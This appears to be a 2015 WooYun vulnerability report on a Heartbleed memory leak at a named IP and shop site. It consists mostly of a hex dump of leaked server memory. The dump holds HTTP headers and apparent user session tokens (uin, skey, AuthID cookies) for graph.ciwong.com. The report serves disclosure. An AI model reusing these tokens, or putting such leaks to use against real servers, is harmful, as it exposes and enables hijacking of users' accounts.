2015-07-07: 细节已通知厂商并且等待厂商处理中 2015-07-12: 厂商已经主动忽略漏洞,细节向公众公开
duang~~~
121.14.117.55->http://szxsc.shop.6v68.com
Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4C 61 6E 67 ....#.......Lang 00e0: 75 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A 41 63 63 uage: zh-cn..Acc 00f0: 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz 0100: 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65 ip, deflate..Use 0110: 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla 0120: 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible 0130: 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind 0140: 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 29 ows NT 5.1; SV1) 0150: 0D 0A 48 6F 73 74 3A 20 67 72 61 70 68 2E 63 69 ..Host: graph.ci 0160: 77 6F 6E 67 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 wong.com..Connec 0170: 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 tion: Keep-Alive 0180: 0D 0A 0D 0A 3D 3E 4E 37 CB 07 12 3D A3 BE E1 C2 ....=>N7...=.... 0190: DB 15 71 1A 19 30 4E 6A 07 07 07 07 07 07 07 07 ..q..0Nj........ 01a0: 20 43 4C 52 20 33 2E 30 2E 30 34 35 30 36 2E 33 CLR 3.0.04506.3 01b0: 30 3B 20 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 0; .NET CLR 3.0. 01c0: 34 35 30 36 2E 32 31 35 32 3B 20 2E 4E 45 54 20 4506.2152; .NET 01d0: 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 29 0D 0A CLR 3.5.30729).. 01e0: 48 6F 73 74 3A 20 67 72 61 70 68 2E 63 69 77 6F Host: graph.ciwo 01f0: 6E 67 2E 63 6F 6D 0D 0A 0D 0A 80 02 FE 39 96 AF ng.com.......9.. 0200: 30 58 24 AC 82 FE B2 BA C9 B2 F6 CC 8D 4B 01 01 0X$..........K.. 0210: D1 A5 7A E3 19 F3 DB 88 8C 08 05 05 05 05 05 05 ..z............. 0220: 31 2E 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 1.utmcsr=(direct 0230: 29 7C 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 )|utmccn=(direct 0240: 29 7C 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 3B )|utmcmd=(none); 0250: 20 70 67 76 5F 70 76 69 3D 31 37 34 34 33 38 34 pgv_pvi=1744384 0260: 30 30 0D 0A 48 6F 73 74 3A 20 67 72 61 70 68 2E 00..Host: graph. 0270: 63 69 77 6F 6E 67 2E 63 6F 6D 0D 0A 43 6F 6E 6E ciwong.com..Conn 0280: 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali 0290: 76 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 ve..Accept-Langu 02a0: 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A 0D 0A 4E 67 age: zh-cn....Ng 02b0: F7 0D 40 D2 A6 6A 9E 52 9F 15 6E 07 46 A7 99 D7 ..@..j.R..n.F... 02c0: 48 DF 05 05 05 05 05 05 61 46 6E 77 4E 61 44 30 H.......aFnwNaD0 02d0: 66 53 79 54 49 43 50 75 78 61 61 6A 37 43 4C 35 fSyTICPuxaaj7CL5 02e0: 6F 78 65 66 76 6F 52 55 31 2B 6A 39 68 38 62 51 oxefvoRU1+j9h8bQ 02f0: 3D 3D 3B 20 75 69 6E 3D 34 33 39 30 32 30 34 34 ==; uin=43902044 0300: 35 3B 20 73 6B 65 79 3D 40 38 61 64 64 38 38 31 5; skey=@8add881 0310: 37 65 33 0D 0A 0D 0A 35 80 FB 46 03 03 F2 D7 A3 7e3....5..F..... 0320: 39 DA 0C 5B 3E 70 97 00 21 B4 30 04 04 04 04 04 9..[>p..!.0..... 0330: 8F 3C 39 04 04 04 04 04 4E 34 30 46 31 55 42 36 .<9.....N40F1UB6 0340: 6B 74 2F 31 4B 4A 6D 46 4C 74 55 44 6B 39 76 4B kt/1KJmFLtUDk9vK 0350: 36 6D 44 4A 7A 50 34 56 68 49 6B 41 66 65 76 64 6mDJzP4VhIkAfevd 0360: 68 49 4A 2F 35 45 71 44 39 44 62 77 50 73 4A 65 hIJ/5EqD9DbwPsJe 0370: 2F 2F 77 33 2B 4E 79 7A 42 4C 44 73 72 39 35 34 //w3+NyzBLDsr954 0380: 61 43 78 6C 35 61 51 62 79 6E 33 37 31 64 6A 4C aCxl5aQbyn371djL 0390: 73 52 49 68 68 79 52 4F 6A 46 43 31 61 50 4A 6F sRIhhyROjFC1aPJo 03a0: 47 79 2B 75 54 42 6D 39 52 4F 71 57 6F 57 74 2B Gy+uTBm9ROqWoWt+ 03b0: 6B 70 59 64 38 66 51 2F 62 72 66 6C 35 56 66 38 kpYd8fQ/brfl5Vf8 03c0: 4B 57 72 36 72 77 76 75 67 6A 49 43 52 4B 74 35 KWr6rwvugjICRKt5 03d0: 61 72 57 4A 36 31 7A 55 4B 46 6E 38 62 6B 74 32 arWJ61zUKFn8bkt2 03e0: 58 68 78 32 57 69 2F 6F 37 64 62 35 51 48 31 6F Xhx2Wi/o7db5QH1o 03f0: 55 64 33 76 6B 4D 41 4B 2F 37 47 48 36 4D 42 58 Ud3vkMAK/7GH6MBX 0400: 42 75 57 34 46 77 31 56 75 33 49 4C 30 76 75 76 BuW4Fw1Vu3IL0vuv 0410: 51 7A 4C 4F 41 69 4D 6D 71 52 5A 36 57 43 76 5A QzLOAiMmqRZ6WCvZ 0420: 62 30 69 54 54 76 55 6D 30 50 45 2B 6A 64 68 37 b0iTTvUm0PE+jdh7 0430: 2B 74 69 66 75 78 56 47 66 75 47 4E 41 51 63 31 +tifuxVGfuGNAQc1 0440: 2B 5A 78 73 32 38 71 6F 32 6E 32 53 62 36 72 41 +Zxs28qo2n2Sb6rA 0450: 54 66 35 57 48 48 67 4B 6B 68 53 56 6F 68 6C 42 Tf5WHHgKkhSVohlB 0460: 36 66 43 67 6A 6F 58 48 6E 44 69 4A 70 49 61 5A 6fCgjoXHnDiJpIaZ 0470: 2F 2F 31 77 33 48 68 4D 42 73 46 6B 6D 72 6E 61 //1w3HhMBsFkmrna 0480: 72 6D 69 71 35 31 2B 50 42 75 4B 43 71 30 71 36 rmiq51+PBuKCq0q6 0490: 65 6D 65 42 57 5A 6B 3B 20 41 75 74 68 49 44 3D emeBWZk; AuthID= 04a0: 64 75 46 78 7A 74 54 31 65 72 43 30 68 61 2F 58 duFxztT1erC0ha/X 04b0: 4B 4E 37 41 56 5A 52 37 2F 72 50 58 41 6E 48 52 KN7AVZR7/rPXAnHR 04c0: 71 6A 74 56 42 6C 6E 2F 39 63 36 62 73 35 2B 36 qjtVBln/9c6bs5+6 04d0: 66 47 4D 2F 73 7A 42 65 34 55 63 4B 6D 56 73 41 fGM/szBe4UcKmVsA 04e0: 46 69 47 45 53 74 70 41 42 6D 33 49 69 61 31 35 FiGEStpABm3Iia15 04f0: 34 38 76 4E 63 31 67 78 44 36 57 72 44 6F 5A 6D 48vNc1gxD6WrDoZm 0500: 73 55 39 6E 5A 78 48 76 48 35 5A 65 76 56 75 48 sU9nZxHvH5ZevVuH 0510: 51 72 43 59 43 4C 54 65 44 64 53 77 75 37 34 4B QrCYCLTeDdSwu74K 0520: 52 55 2F 6B 41 66 74 71 74 55 78 63 30 2B 6E 32 RU/kAftqtUxc0+n2 0530: 38 56 5A 36 77 79 57 77 33 58 64 77 57 6C 48 63 8VZ6wyWw3XdwWlHc 0540: 37 36 45 41 5A 6A 53 34 6D 49 63 4F 31 65 61 4A 76EAZjS4mIcO1eaJ 0550: 61 49 37 6C 36 56 77 43 2F 64 39 62 2B 70 70 4B aI7l6VwC/d9b+ppK 0560: 41 33 48 6D 49 6B 6F 33 69 79 4D 6D 4A 61 61 44 A3HmIko3iyMmJaaD 0570: 5A 50 4B 4B 6F 41 3D 3D 3B 20 75 69 6E 3D 34 38 ZPKKoA==; uin=48 0580: 30 37 36 35 37 33 38 3B 20 73 6B 65 79 3D 40 30 0765738; skey=@0 0590: 33 35 34 61 34 30 36 64 36 3B 20 43 4E 5A 5A 44 354a406d6; CNZZD 05a0: 41 54 41 31 35 32 33 31 32 35 3D 63 6E 7A 7A 5F ATA1523125=cnzz_ 05b0: 65 69 64 25 33 44 31 32 32 35 30 35 38 34 35 30 eid%3D1225058450 05c0: 2D 31 34 33 36 32 34 35 32 37 39 2D 25 32 36 6E -1436245279-%26n 05d0: 74 69 6D 65 25 33 44 31 34 33 36 32 35 30 36 37 time%3D143625067 05e0: 39 3B 20 43 4E 5A 5A 44 41 54 41 31 32 35 33 34 9; CNZZDATA12534 05f0: 30 35 35 39 39 3D 32 38 34 39 38 36 35 38 37 2D 05599=284986587- 0600: 31 34 33 36 32 34 38 37 30 36 2D 25 37 43 31 34 1436248706-%7C14 0610: 33 36 32 34 38 37 30 36 0D 0A 41 63 63 65 70 74 36248706..Accept 0620: 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 0D -Encoding: gzip. 0630: 0A 58 2D 56 69 61 3A 20 31 2E 31 20 64 67 31 34 .X-Via: 1.1 dg14 0640: 31 3A 33 20 28 43 64 6E 20 43 61 63 68 65 20 53 1:3 (Cdn Cache S 0650: 65 72 76 65 72 20 56 32 2E 30 29 0D 0A 43 61 63 erver V2.0)..Cac 0660: 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D he-Control: max- 0670: 61 67 65 3D 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F age=0..Connectio 0680: 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D n: keep-alive... 0690: 0A 8A 57 4F 2C 6C 4D 53 2A 3D 48 11 4C 4D F0 3C ..WO,lMS*=H.LM.< 06a0: F7 3F 88 E0 78 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A .?..x........... 06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 06d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
打补丁
危害等级:无影响厂商忽略
忽略时间:2015-07-12 22:54
漏洞Rank:4 (WooYun评价)
暂无
